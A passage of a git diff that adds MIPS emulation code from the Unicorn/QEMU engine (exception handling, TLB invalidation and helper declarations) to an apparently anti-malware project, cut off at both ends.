env->CP0_Status >> 8; + /* Compute the Vector Spacing. */ + spacing = (env->CP0_IntCtl >> CP0IntCtl_VS) & ((1 << 6) - 1); + spacing <<= 5; + + if (env->CP0_Config3 & (1 << CP0C3_VInt)) { + /* For VInt mode, the MIPS computes the vector internally. */ + for (vector = 7; vector > 0; vector--) { + if (pending & (1 << vector)) { + /* Found it. */ + break; + } + } + } else { + /* For VEIC mode, the external interrupt controller feeds the + vector through the CP0Cause IP lines. */ + vector = pending; + } + offset = 0x200 + vector * spacing; + } + goto set_EPC; + case EXCP_LTLBL: + cause = 1; + update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); + goto set_EPC; + case EXCP_TLBL: + cause = 2; + update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); + if ((env->error_code & EXCP_TLB_NOMATCH) && + !(env->CP0_Status & (1 << CP0St_EXL))) { +#if defined(TARGET_MIPS64) + int R = env->CP0_BadVAddr >> 62; + int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; + int SX = (env->CP0_Status & (1 << CP0St_SX)) != 0; + int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; + + if (((R == 0 && UX) || (R == 1 && SX) || (R == 3 && KX)) && + (!(env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)))) + offset = 0x080; + else +#endif + offset = 0x000; + } + goto set_EPC; + case EXCP_TLBS: + cause = 3; + update_badinstr = 1; + if ((env->error_code & EXCP_TLB_NOMATCH) && + !(env->CP0_Status & (1 << CP0St_EXL))) { +#if defined(TARGET_MIPS64) + int R = env->CP0_BadVAddr >> 62; + int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; + int SX = (env->CP0_Status & (1 << CP0St_SX)) != 0; + int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; + + if (((R == 0 && UX) || (R == 1 && SX) || (R == 3 && KX)) && + (!(env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)))) + offset = 0x080; + else +#endif + offset = 0x000; + } + goto set_EPC; + case EXCP_AdEL: + cause = 4; + update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); + goto set_EPC; + case EXCP_AdES: + cause = 5; + update_badinstr = 1; + goto set_EPC; + case EXCP_IBE: + cause = 6; + goto set_EPC; + case EXCP_DBE: + cause = 7; + goto set_EPC; + case EXCP_SYSCALL: + cause = 8; + update_badinstr = 1; + goto set_EPC; + case EXCP_BREAK: + cause = 9; + update_badinstr = 1; + goto set_EPC; + case EXCP_RI: + cause = 10; + update_badinstr = 1; + goto set_EPC; + case EXCP_CpU: + cause = 11; + update_badinstr = 1; + env->CP0_Cause = (env->CP0_Cause & ~(0x3 << CP0Ca_CE)) | + (env->error_code << CP0Ca_CE); + goto set_EPC; + case EXCP_OVERFLOW: + cause = 12; + update_badinstr = 1; + goto set_EPC; + case EXCP_TRAP: + cause = 13; + update_badinstr = 1; + goto set_EPC; + case EXCP_MSAFPE: + cause = 14; + update_badinstr = 1; + goto set_EPC; + case EXCP_FPE: + cause = 15; + update_badinstr = 1; + goto set_EPC; + case EXCP_C2E: + cause = 18; + goto set_EPC; + case EXCP_TLBRI: + cause = 19; + update_badinstr = 1; + goto set_EPC; + case EXCP_TLBXI: + cause = 20; + goto set_EPC; + case EXCP_MSADIS: + cause = 21; + update_badinstr = 1; + goto set_EPC; + case EXCP_MDMX: + cause = 22; + goto set_EPC; + case EXCP_DWATCH: + cause = 23; + /* XXX: TODO: manage defered watch exceptions */ + goto set_EPC; + case EXCP_MCHECK: + cause = 24; + goto set_EPC; + case EXCP_THREAD: + cause = 25; + goto set_EPC; + case EXCP_DSPDIS: + cause = 26; + goto set_EPC; + case EXCP_CACHE: + cause = 30; + if (env->CP0_Status & (1 << CP0St_BEV)) { + offset = 0x100; + } else { + offset = 0x20000100; + } + set_EPC: + if (!(env->CP0_Status & (1 << CP0St_EXL))) { + env->CP0_EPC = exception_resume_pc(env); + if (update_badinstr) { + set_badinstr_registers(env); + } + if (env->hflags & MIPS_HFLAG_BMASK) { + env->CP0_Cause |= (1U << CP0Ca_BD); + } else { + env->CP0_Cause &= ~(1U << CP0Ca_BD); + } + env->CP0_Status |= (1 << CP0St_EXL); + env->hflags |= MIPS_HFLAG_64 | MIPS_HFLAG_CP0; + env->hflags &= ~(MIPS_HFLAG_KSU); + } + env->hflags &= ~MIPS_HFLAG_BMASK; + if (env->CP0_Status & (1 << CP0St_BEV)) { + env->active_tc.PC = (int32_t)0xBFC00200; + } else { + env->active_tc.PC = (int32_t)(env->CP0_EBase & ~0x3ff); + } + env->active_tc.PC += offset; + set_hflags_for_handler(env); + env->CP0_Cause = (env->CP0_Cause & ~(0x1f << CP0Ca_EC)) | (cause << CP0Ca_EC); + break; + default: + qemu_log("Invalid MIPS exception %d. Exiting\n", cs->exception_index); + printf("Invalid MIPS exception %d. Exiting\n", cs->exception_index); + exit(1); + } + if (qemu_log_enabled() && cs->exception_index != EXCP_EXT_INTERRUPT) { + qemu_log("%s: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx " cause %d\n" + " S %08x C %08x A " TARGET_FMT_lx " D " TARGET_FMT_lx "\n", + __func__, env->active_tc.PC, env->CP0_EPC, cause, + env->CP0_Status, env->CP0_Cause, env->CP0_BadVAddr, + env->CP0_DEPC); + } +#endif + cs->exception_index = EXCP_NONE; +} + +bool mips_cpu_exec_interrupt(CPUState *cs, int interrupt_request) // qq +{ + if (interrupt_request & CPU_INTERRUPT_HARD) { + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + + if (cpu_mips_hw_interrupts_pending(env)) { + /* Raise it */ + cs->exception_index = EXCP_EXT_INTERRUPT; + env->error_code = 0; + mips_cpu_do_interrupt(cs); + return true; + } + } + return false; +} + +#if !defined(CONFIG_USER_ONLY) +void r4k_invalidate_tlb (CPUMIPSState *env, int idx, int use_extra) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + CPUState *cs; + r4k_tlb_t *tlb; + target_ulong addr; + target_ulong end; + uint8_t ASID = env->CP0_EntryHi & 0xFF; + target_ulong mask; + + tlb = &env->tlb->mmu.r4k.tlb[idx]; + /* The qemu TLB is flushed when the ASID changes, so no need to + flush these entries again. */ + if (tlb->G == 0 && tlb->ASID != ASID) { + return; + } + + if (use_extra && env->tlb->tlb_in_use < MIPS_TLB_MAX) { + /* For tlbwr, we can shadow the discarded entry into + a new (fake) TLB entry, as long as the guest can not + tell that it's there. */ + env->tlb->mmu.r4k.tlb[env->tlb->tlb_in_use] = *tlb; + env->tlb->tlb_in_use++; + return; + } + + /* 1k pages are not supported. */ + mask = tlb->PageMask | ~(((unsigned int)TARGET_PAGE_MASK) << 1); + if (tlb->V0) { + cs = CPU(cpu); + addr = tlb->VPN & ~mask; +#if defined(TARGET_MIPS64) + if (addr >= (0xFFFFFFFF80000000ULL & env->SEGMask)) { + addr |= 0x3FFFFF0000000000ULL; + } +#endif + end = addr | (mask >> 1); + while (addr < end) { + tlb_flush_page(cs, addr); + addr += TARGET_PAGE_SIZE; + } + } + if (tlb->V1) { + cs = CPU(cpu); + addr = (tlb->VPN & ~mask) | ((mask >> 1) + 1); +#if defined(TARGET_MIPS64) + if (addr >= (0xFFFFFFFF80000000ULL & env->SEGMask)) { + addr |= 0x3FFFFF0000000000ULL; + } +#endif + end = addr | mask; + while (addr - 1 < end) { + tlb_flush_page(cs, addr); + addr += TARGET_PAGE_SIZE; + } + } +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.h new file mode 100644 index 0000000..1924bf6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.h @@ -0,0 +1,936 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) + +DEF_HELPER_3(raise_exception_err, noreturn, env, i32, int) +DEF_HELPER_2(raise_exception, noreturn, env, i32) + +#ifdef TARGET_MIPS64 +DEF_HELPER_4(sdl, void, env, tl, tl, int) +DEF_HELPER_4(sdr, void, env, tl, tl, int) +#endif +DEF_HELPER_4(swl, void, env, tl, tl, int) +DEF_HELPER_4(swr, void, env, tl, tl, int) + +#ifndef CONFIG_USER_ONLY +DEF_HELPER_3(ll, tl, env, tl, int) +DEF_HELPER_4(sc, tl, env, tl, tl, int) +#ifdef TARGET_MIPS64 +DEF_HELPER_3(lld, tl, env, tl, int) +DEF_HELPER_4(scd, tl, env, tl, tl, int) +#endif +#endif + +DEF_HELPER_FLAGS_1(clo, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(clz, TCG_CALL_NO_RWG_SE, tl, tl) +#ifdef TARGET_MIPS64 +DEF_HELPER_FLAGS_1(dclo, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(dclz, TCG_CALL_NO_RWG_SE, tl, tl) +#endif + +DEF_HELPER_3(muls, tl, env, tl, tl) +DEF_HELPER_3(mulsu, tl, env, tl, tl) +DEF_HELPER_3(macc, tl, env, tl, tl) +DEF_HELPER_3(maccu, tl, env, tl, tl) +DEF_HELPER_3(msac, tl, env, tl, tl) +DEF_HELPER_3(msacu, tl, env, tl, tl) +DEF_HELPER_3(mulhi, tl, env, tl, tl) +DEF_HELPER_3(mulhiu, tl, env, tl, tl) +DEF_HELPER_3(mulshi, tl, env, tl, tl) +DEF_HELPER_3(mulshiu, tl, env, tl, tl) +DEF_HELPER_3(macchi, tl, env, tl, tl) +DEF_HELPER_3(macchiu, tl, env, tl, tl) +DEF_HELPER_3(msachi, tl, env, tl, tl) +DEF_HELPER_3(msachiu, tl, env, tl, tl) + +DEF_HELPER_FLAGS_1(bitswap, TCG_CALL_NO_RWG_SE, tl, tl) +#ifdef TARGET_MIPS64 +DEF_HELPER_FLAGS_1(dbitswap, TCG_CALL_NO_RWG_SE, tl, tl) +#endif + +#ifndef CONFIG_USER_ONLY +/* CP0 helpers */ +DEF_HELPER_1(mfc0_mvpcontrol, tl, env) +DEF_HELPER_1(mfc0_mvpconf0, tl, env) +DEF_HELPER_1(mfc0_mvpconf1, tl, env) +DEF_HELPER_1(mftc0_vpecontrol, tl, env) +DEF_HELPER_1(mftc0_vpeconf0, tl, env) +DEF_HELPER_1(mfc0_random, tl, env) +DEF_HELPER_1(mfc0_tcstatus, tl, env) +DEF_HELPER_1(mftc0_tcstatus, tl, env) +DEF_HELPER_1(mfc0_tcbind, tl, env) +DEF_HELPER_1(mftc0_tcbind, tl, env) +DEF_HELPER_1(mfc0_tcrestart, tl, env) +DEF_HELPER_1(mftc0_tcrestart, tl, env) +DEF_HELPER_1(mfc0_tchalt, tl, env) +DEF_HELPER_1(mftc0_tchalt, tl, env) +DEF_HELPER_1(mfc0_tccontext, tl, env) +DEF_HELPER_1(mftc0_tccontext, tl, env) +DEF_HELPER_1(mfc0_tcschedule, tl, env) +DEF_HELPER_1(mftc0_tcschedule, tl, env) +DEF_HELPER_1(mfc0_tcschefback, tl, env) +DEF_HELPER_1(mftc0_tcschefback, tl, env) +DEF_HELPER_1(mfc0_count, tl, env) +DEF_HELPER_1(mftc0_entryhi, tl, env) +DEF_HELPER_1(mftc0_status, tl, env) +DEF_HELPER_1(mftc0_cause, tl, env) +DEF_HELPER_1(mftc0_epc, tl, env) +DEF_HELPER_1(mftc0_ebase, tl, env) +DEF_HELPER_2(mftc0_configx, tl, env, tl) +DEF_HELPER_1(mfc0_lladdr, tl, env) +DEF_HELPER_2(mfc0_watchlo, tl, env, i32) +DEF_HELPER_2(mfc0_watchhi, tl, env, i32) +DEF_HELPER_1(mfc0_debug, tl, env) +DEF_HELPER_1(mftc0_debug, tl, env) +#ifdef TARGET_MIPS64 +DEF_HELPER_1(dmfc0_tcrestart, tl, env) +DEF_HELPER_1(dmfc0_tchalt, tl, env) +DEF_HELPER_1(dmfc0_tccontext, tl, env) +DEF_HELPER_1(dmfc0_tcschedule, tl, env) +DEF_HELPER_1(dmfc0_tcschefback, tl, env) +DEF_HELPER_1(dmfc0_lladdr, tl, env) +DEF_HELPER_2(dmfc0_watchlo, tl, env, i32) +#endif /* TARGET_MIPS64 */ + +DEF_HELPER_2(mtc0_index, void, env, tl) +DEF_HELPER_2(mtc0_mvpcontrol, void, env, tl) +DEF_HELPER_2(mtc0_vpecontrol, void, env, tl) +DEF_HELPER_2(mttc0_vpecontrol, void, env, tl) +DEF_HELPER_2(mtc0_vpeconf0, void, env, tl) +DEF_HELPER_2(mttc0_vpeconf0, void, env, tl) +DEF_HELPER_2(mtc0_vpeconf1, void, env, tl) +DEF_HELPER_2(mtc0_yqmask, void, env, tl) +DEF_HELPER_2(mtc0_vpeopt, void, env, tl) +DEF_HELPER_2(mtc0_entrylo0, void, env, tl) +DEF_HELPER_2(mtc0_tcstatus, void, env, tl) +DEF_HELPER_2(mttc0_tcstatus, void, env, tl) +DEF_HELPER_2(mtc0_tcbind, void, env, tl) +DEF_HELPER_2(mttc0_tcbind, void, env, tl) +DEF_HELPER_2(mtc0_tcrestart, void, env, tl) +DEF_HELPER_2(mttc0_tcrestart, void, env, tl) +DEF_HELPER_2(mtc0_tchalt, void, env, tl) +DEF_HELPER_2(mttc0_tchalt, void, env, tl) +DEF_HELPER_2(mtc0_tccontext, void, env, tl) +DEF_HELPER_2(mttc0_tccontext, void, env, tl) +DEF_HELPER_2(mtc0_tcschedule, void, env, tl) +DEF_HELPER_2(mttc0_tcschedule, void, env, tl) +DEF_HELPER_2(mtc0_tcschefback, void, env, tl) +DEF_HELPER_2(mttc0_tcschefback, void, env, tl) +DEF_HELPER_2(mtc0_entrylo1, void, env, tl) +DEF_HELPER_2(mtc0_context, void, env, tl) +DEF_HELPER_2(mtc0_pagemask, void, env, tl) +DEF_HELPER_2(mtc0_pagegrain, void, env, tl) +DEF_HELPER_2(mtc0_wired, void, env, tl) +DEF_HELPER_2(mtc0_srsconf0, void, env, tl) +DEF_HELPER_2(mtc0_srsconf1, void, env, tl) +DEF_HELPER_2(mtc0_srsconf2, void, env, tl) +DEF_HELPER_2(mtc0_srsconf3, void, env, tl) +DEF_HELPER_2(mtc0_srsconf4, void, env, tl) +DEF_HELPER_2(mtc0_hwrena, void, env, tl) +DEF_HELPER_2(mtc0_count, void, env, tl) +DEF_HELPER_2(mtc0_entryhi, void, env, tl) +DEF_HELPER_2(mttc0_entryhi, void, env, tl) +DEF_HELPER_2(mtc0_compare, void, env, tl) +DEF_HELPER_2(mtc0_status, void, env, tl) +DEF_HELPER_2(mttc0_status, void, env, tl) +DEF_HELPER_2(mtc0_intctl, void, env, tl) +DEF_HELPER_2(mtc0_srsctl, void, env, tl) +DEF_HELPER_2(mtc0_cause, void, env, tl) +DEF_HELPER_2(mttc0_cause, void, env, tl) +DEF_HELPER_2(mtc0_ebase, void, env, tl) +DEF_HELPER_2(mttc0_ebase, void, env, tl) +DEF_HELPER_2(mtc0_config0, void, env, tl) +DEF_HELPER_2(mtc0_config2, void, env, tl) +DEF_HELPER_2(mtc0_config4, void, env, tl) +DEF_HELPER_2(mtc0_config5, void, env, tl) +DEF_HELPER_2(mtc0_lladdr, void, env, tl) +DEF_HELPER_3(mtc0_watchlo, void, env, tl, i32) +DEF_HELPER_3(mtc0_watchhi, void, env, tl, i32) +DEF_HELPER_2(mtc0_xcontext, void, env, tl) +DEF_HELPER_2(mtc0_framemask, void, env, tl) +DEF_HELPER_2(mtc0_debug, void, env, tl) +DEF_HELPER_2(mttc0_debug, void, env, tl) +DEF_HELPER_2(mtc0_performance0, void, env, tl) +DEF_HELPER_2(mtc0_taglo, void, env, tl) +DEF_HELPER_2(mtc0_datalo, void, env, tl) +DEF_HELPER_2(mtc0_taghi, void, env, tl) +DEF_HELPER_2(mtc0_datahi, void, env, tl) + +#if defined(TARGET_MIPS64) +DEF_HELPER_2(dmtc0_entrylo0, void, env, i64) +DEF_HELPER_2(dmtc0_entrylo1, void, env, i64) +#endif + +/* MIPS MT functions */ +DEF_HELPER_2(mftgpr, tl, env, i32) +DEF_HELPER_2(mftlo, tl, env, i32) +DEF_HELPER_2(mfthi, tl, env, i32) +DEF_HELPER_2(mftacx, tl, env, i32) +DEF_HELPER_1(mftdsp, tl, env) +DEF_HELPER_3(mttgpr, void, env, tl, i32) +DEF_HELPER_3(mttlo, void, env, tl, i32) +DEF_HELPER_3(mtthi, void, env, tl, i32) +DEF_HELPER_3(mttacx, void, env, tl, i32) +DEF_HELPER_2(mttdsp, void, env, tl) +DEF_HELPER_0(dmt, tl) +DEF_HELPER_0(emt, tl) +DEF_HELPER_1(dvpe, tl, env) +DEF_HELPER_1(evpe, tl, env) +#endif /* !CONFIG_USER_ONLY */ + +/* microMIPS functions */ +DEF_HELPER_4(lwm, void, env, tl, tl, i32) +DEF_HELPER_4(swm, void, env, tl, tl, i32) +#ifdef TARGET_MIPS64 +DEF_HELPER_4(ldm, void, env, tl, tl, i32) +DEF_HELPER_4(sdm, void, env, tl, tl, i32) +#endif + +DEF_HELPER_2(fork, void, tl, tl) +DEF_HELPER_2(yield, tl, env, tl) + +/* CP1 functions */ +DEF_HELPER_2(cfc1, tl, env, i32) +DEF_HELPER_4(ctc1, void, env, tl, i32, i32) + +DEF_HELPER_2(float_cvtd_s, i64, env, i32) +DEF_HELPER_2(float_cvtd_w, i64, env, i32) +DEF_HELPER_2(float_cvtd_l, i64, env, i64) +DEF_HELPER_2(float_cvtl_d, i64, env, i64) +DEF_HELPER_2(float_cvtl_s, i64, env, i32) +DEF_HELPER_2(float_cvtps_pw, i64, env, i64) +DEF_HELPER_2(float_cvtpw_ps, i64, env, i64) +DEF_HELPER_2(float_cvts_d, i32, env, i64) +DEF_HELPER_2(float_cvts_w, i32, env, i32) +DEF_HELPER_2(float_cvts_l, i32, env, i64) +DEF_HELPER_2(float_cvts_pl, i32, env, i32) +DEF_HELPER_2(float_cvts_pu, i32, env, i32) +DEF_HELPER_2(float_cvtw_s, i32, env, i32) +DEF_HELPER_2(float_cvtw_d, i32, env, i64) + +DEF_HELPER_3(float_addr_ps, i64, env, i64, i64) +DEF_HELPER_3(float_mulr_ps, i64, env, i64, i64) + +DEF_HELPER_FLAGS_1(float_class_s, TCG_CALL_NO_RWG_SE, i32, i32) +DEF_HELPER_FLAGS_1(float_class_d, TCG_CALL_NO_RWG_SE, i64, i64) + +#define FOP_PROTO(op) \ +DEF_HELPER_4(float_ ## op ## _s, i32, env, i32, i32, i32) \ +DEF_HELPER_4(float_ ## op ## _d, i64, env, i64, i64, i64) +FOP_PROTO(maddf) +FOP_PROTO(msubf) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_3(float_ ## op ## _s, i32, env, i32, i32) \ +DEF_HELPER_3(float_ ## op ## _d, i64, env, i64, i64) +FOP_PROTO(max) +FOP_PROTO(maxa) +FOP_PROTO(min) +FOP_PROTO(mina) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_2(float_ ## op ## l_s, i64, env, i32) \ +DEF_HELPER_2(float_ ## op ## l_d, i64, env, i64) \ +DEF_HELPER_2(float_ ## op ## w_s, i32, env, i32) \ +DEF_HELPER_2(float_ ## op ## w_d, i32, env, i64) +FOP_PROTO(round) +FOP_PROTO(trunc) +FOP_PROTO(ceil) +FOP_PROTO(floor) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_2(float_ ## op ## _s, i32, env, i32) \ +DEF_HELPER_2(float_ ## op ## _d, i64, env, i64) +FOP_PROTO(sqrt) +FOP_PROTO(rsqrt) +FOP_PROTO(recip) +FOP_PROTO(rint) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_1(float_ ## op ## _s, i32, i32) \ +DEF_HELPER_1(float_ ## op ## _d, i64, i64) \ +DEF_HELPER_1(float_ ## op ## _ps, i64, i64) +FOP_PROTO(abs) +FOP_PROTO(chs) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_2(float_ ## op ## _s, i32, env, i32) \ +DEF_HELPER_2(float_ ## op ## _d, i64, env, i64) \ +DEF_HELPER_2(float_ ## op ## _ps, i64, env, i64) +FOP_PROTO(recip1) +FOP_PROTO(rsqrt1) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_3(float_ ## op ## _s, i32, env, i32, i32) \ +DEF_HELPER_3(float_ ## op ## _d, i64, env, i64, i64) \ +DEF_HELPER_3(float_ ## op ## _ps, i64, env, i64, i64) +FOP_PROTO(add) +FOP_PROTO(sub) +FOP_PROTO(mul) +FOP_PROTO(div) +FOP_PROTO(recip2) +FOP_PROTO(rsqrt2) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_4(float_ ## op ## _s, i32, env, i32, i32, i32) \ +DEF_HELPER_4(float_ ## op ## _d, i64, env, i64, i64, i64) \ +DEF_HELPER_4(float_ ## op ## _ps, i64, env, i64, i64, i64) +FOP_PROTO(madd) +FOP_PROTO(msub) +FOP_PROTO(nmadd) +FOP_PROTO(nmsub) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_4(cmp_d_ ## op, void, env, i64, i64, int) \ +DEF_HELPER_4(cmpabs_d_ ## op, void, env, i64, i64, int) \ +DEF_HELPER_4(cmp_s_ ## op, void, env, i32, i32, int) \ +DEF_HELPER_4(cmpabs_s_ ## op, void, env, i32, i32, int) \ +DEF_HELPER_4(cmp_ps_ ## op, void, env, i64, i64, int) \ +DEF_HELPER_4(cmpabs_ps_ ## op, void, env, i64, i64, int) +FOP_PROTO(f) +FOP_PROTO(un) +FOP_PROTO(eq) +FOP_PROTO(ueq) +FOP_PROTO(olt) +FOP_PROTO(ult) +FOP_PROTO(ole) +FOP_PROTO(ule) +FOP_PROTO(sf) +FOP_PROTO(ngle) +FOP_PROTO(seq) +FOP_PROTO(ngl) +FOP_PROTO(lt) +FOP_PROTO(nge) +FOP_PROTO(le) +FOP_PROTO(ngt) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_3(r6_cmp_d_ ## op, i64, env, i64, i64) \ +DEF_HELPER_3(r6_cmp_s_ ## op, i32, env, i32, i32) +FOP_PROTO(af) +FOP_PROTO(un) +FOP_PROTO(eq) +FOP_PROTO(ueq) +FOP_PROTO(lt) +FOP_PROTO(ult) +FOP_PROTO(le) +FOP_PROTO(ule) +FOP_PROTO(saf) +FOP_PROTO(sun) +FOP_PROTO(seq) +FOP_PROTO(sueq) +FOP_PROTO(slt) +FOP_PROTO(sult) +FOP_PROTO(sle) +FOP_PROTO(sule) +FOP_PROTO(or) +FOP_PROTO(une) +FOP_PROTO(ne) +FOP_PROTO(sor) +FOP_PROTO(sune) +FOP_PROTO(sne) +#undef FOP_PROTO + +/* Special functions */ +#ifndef CONFIG_USER_ONLY +DEF_HELPER_1(tlbwi, void, env) +DEF_HELPER_1(tlbwr, void, env) +DEF_HELPER_1(tlbp, void, env) +DEF_HELPER_1(tlbr, void, env) +DEF_HELPER_1(tlbinv, void, env) +DEF_HELPER_1(tlbinvf, void, env) +DEF_HELPER_1(di, tl, env) +DEF_HELPER_1(ei, tl, env) +DEF_HELPER_1(eret, void, env) +DEF_HELPER_1(deret, void, env) +#endif /* !CONFIG_USER_ONLY */ +DEF_HELPER_1(rdhwr_cpunum, tl, env) +DEF_HELPER_1(rdhwr_synci_step, tl, env) +DEF_HELPER_1(rdhwr_cc, tl, env) +DEF_HELPER_1(rdhwr_ccres, tl, env) +DEF_HELPER_2(pmon, void, env, int) +DEF_HELPER_1(wait, void, env) + +/* Loongson multimedia functions. */ +DEF_HELPER_FLAGS_2(paddsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddush, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddsb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddusb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddb, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(psubsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubush, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubsb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubusb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubb, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pshufh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(packsswh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(packsshb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(packushb, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(punpcklhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(punpckhhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(punpcklbh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(punpckhbh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(punpcklwd, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(punpckhwd, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pavgh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pavgb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmaxsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pminsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmaxub, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pminub, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pcmpeqw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpgtw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpeqh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpgth, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpeqb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpgtb, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(psllw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psllh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psrlw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psrlh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psraw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psrah, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pmullh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmulhh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmulhuh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmaddhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pasubub, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_1(biadd, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(pmovmskb, TCG_CALL_NO_RWG_SE, i64, i64) + +/*** MIPS DSP ***/ +/* DSP Arithmetic Sub-class insns */ +DEF_HELPER_FLAGS_3(addq_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addq_s_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(addq_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addq_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(addq_s_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(addq_pw, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addq_s_pw, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(addu_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addu_s_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(adduh_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(adduh_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(addu_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addu_s_ph, 0, tl, 